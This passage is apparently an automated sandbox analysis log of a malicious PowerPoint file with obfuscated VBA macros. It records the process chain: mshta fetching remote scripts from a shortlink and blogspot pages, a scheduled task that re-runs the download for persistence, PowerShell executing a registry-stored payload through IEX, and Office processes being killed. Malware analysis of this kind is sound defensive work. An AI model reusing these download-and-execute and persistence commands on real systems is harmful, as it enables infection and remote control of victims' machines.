              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_003FB2EE NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_003FB2CC NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01D9B2EE NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01D9B2CC NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CEB2EE NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CEB2CC NtQuerySystemInformation,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A518A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A574B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A51897
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A574C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A5618D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A51538
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_02A51548
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_02871897
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_028718A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_028774B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_028774C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_02871538
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_02871548
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 29_2_001E6020
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 29_2_001E5408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 29_2_001E5750
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A018A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A074B7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A01897
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A074C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A0618D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A01538
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02A01548
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_02AE1BE2
              Source: BankSwiftCopyUSD95000.pptOLE, VBA macro line: Sub Auto_Close()
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Auto_Close
              Source: BankSwiftCopyUSD95000.pptOLE indicator, VBA macros: true
              Source: BankSwiftCopyUSD95000.pptOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: 29.2.MSBuild.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 29.2.MSBuild.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
              Source: classification engineClassification label: mal100.troj.expl.evad.winPPT@46/51@29/5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_003FACEE AdjustTokenPrivileges,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_003FACB7 AdjustTokenPrivileges,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01D9ACEE AdjustTokenPrivileges,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01D9ACB7 AdjustTokenPrivileges,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CEACEE AdjustTokenPrivileges,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CEACB7 AdjustTokenPrivileges,
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BankSwiftCopyUSD95000.LNKJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC735.tmpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................x.x...............x...............x.......x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................x.x.............................X.'.......x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................x.x...............x.......................x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................6.......................x.x.............................X.'.......x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................?.......................x.x...............x.......................x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................S.......................x.x.....#.......................X.'.......x.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................\.......................x.x.....#.........x.......................x.....
              Source: C:\Windows\System32\schtasks.exeConsole Write: .................................................v-.............................................................................................
              Source: C:\Windows\System32\taskkill.exeConsole Write: ................................................d1......................L...............d...............................X.......B.........3.....
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l.......T.......................................................................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h.......v.......................................................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h...............................................................................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h...............................................................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h...............................................................................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................d.......................................#.......................x...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................d.......................................#.......................................
              Source: C:\Windows\System32\taskkill.exeConsole Write: ................................................d1......................................b...............................T.......B.........'.....
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P.z.......................%.....P.z.......%....... .....`I"........v.....................K).......Y.............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....8.p.....0...............................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... ..............................}..v......p.....0.................Y.............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v......p.....0...............................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....x.Y.............................}..v....0.p.....0.................Y.............................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....................................}..v....0.q.....0...............................................
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....(.Y.............................}..v......q.....0.................Y.............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............`.......|.......G.......................................X...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............`.......|.......h.......................................................X...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............`.......|.......q.......................................X...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............`.......|...............................................................X...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............`.......................................................X...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............`...............................................#.......................X...............
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............`...............................................#.......X...............................
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
              Source: C:\Windows\System32\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;winword.exe&quot;)
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;EXCEL.exe&quot;)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: BankSwiftCopyUSD95000.pptVirustotal: Detection: 34%
              Source: BankSwiftCopyUSD95000.pptReversingLabs: Detection: 21%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
              Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
              Source: unknownProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv
              Source: unknownProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
              Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {2ABF5983-E6CF-46DC-B95A-53E1F6F4D156} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
              Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
              Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).meather)|IEX'', 0 : window.close')
              Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
              Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://backbones1234511a.blogspot.com/p/stback1.html'', 0 : window.close')
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://startthepartyup.blogspot.com/p/backbone14.html'', 0 : window.close')
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html'', 0 : window.close')
              Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\PING.EXE ping.exe
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''mshta https://randikhanaekminar.blogspot.com/p/st2.html'', 0 : window.close')
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://randikhanaekminar.blogspot.com/p/st2.html
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EXCEL.exe
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).meather)|IEX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://backbones1234511a.blogspot.com/p/stback1.html
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://startthepartyup.blogspot.com/p/backbone14.html
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
              Source: Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp
              Source: BankSwiftCopyUSD95000.pptInitial sample: OLE document summary bytes = 0
              Source: BankSwiftCopyUSD95000.pptInitial sample: OLE document summary hiddenslides = 0
              Source: BankSwiftCopyUSD95000.pptInitial sample: OLE document summary mmclips = 0
              Source: BankSwiftCopyUSD95000.pptInitial sample: OLE document summary notes = 0
              Source: BankSwiftCopyUSD95000.pptInitial sample: OLE document summary presentationtarget = Widescreen
              Source: BankSwiftCopyUSD95000.pptInitial sample: OLE document summary slides = 0

              Data Obfuscation:

              barindex
              Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
              Source: BankSwiftCopyUSD95000.pptStream path 'VBA/Module1' : High number of GOTO operations
              Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Module1
              Document contains an embedded VBA with many randomly named variablesShow sources
              Source: BankSwiftCopyUSD95000.pptStream path 'VBA/Module1' : High entropy of concatenated variable names
              Yara detected Costura Assembly LoaderShow sources
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2816, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0040921A pushad ; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_004091D2 push eax; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_05640450 push eax; mov dword ptr [esp], ecx
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01E591D2 push eax; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01E5921A pushad ; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_0571017C push 000000C3h; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_0571045C push eax; mov dword ptr [esp], ecx
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_05791A57 push 6E7FC374h; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_05791B93 push 6E7FC3C4h; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CEA1A8 push DCBDC399h; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF61FF push ebx; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF61FD push ecx; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF61F9 push eax; iretd
